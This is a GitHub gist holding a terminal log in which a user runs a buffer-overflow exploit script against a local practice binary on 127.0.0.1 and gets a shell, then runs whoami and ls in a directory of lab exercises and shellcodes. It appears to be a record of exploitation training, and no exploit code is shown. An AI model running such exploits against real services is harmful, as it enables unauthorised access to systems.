Skip to content

Instantly share code, notes, and snippets.

@fgsahoward
Created June 11, 2018 17:37
Show Gist options
  • Save fgsahoward/984fbde20605d05e5a8c8a4955417704 to your computer and use it in GitHub Desktop.
Save fgsahoward/984fbde20605d05e5a8c8a4955417704 to your computer and use it in GitHub Desktop.
[howard@sterling bof]$ python exploits/med32_exp.py 127.0.0.1 1234
b'Enter some text: '
# whoami
b'howard\n'
# ls
b'core\neasy32\neasy64\neasy.c\nexp\nexploits\ngdb-env\ngdb-s.env\nhard32\nhard.c\ninput\nMakefile\nmed32\nmed64\nNOTES\noutput\nshellcodes\nshell.env\nshell-s.env\ntools\n'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment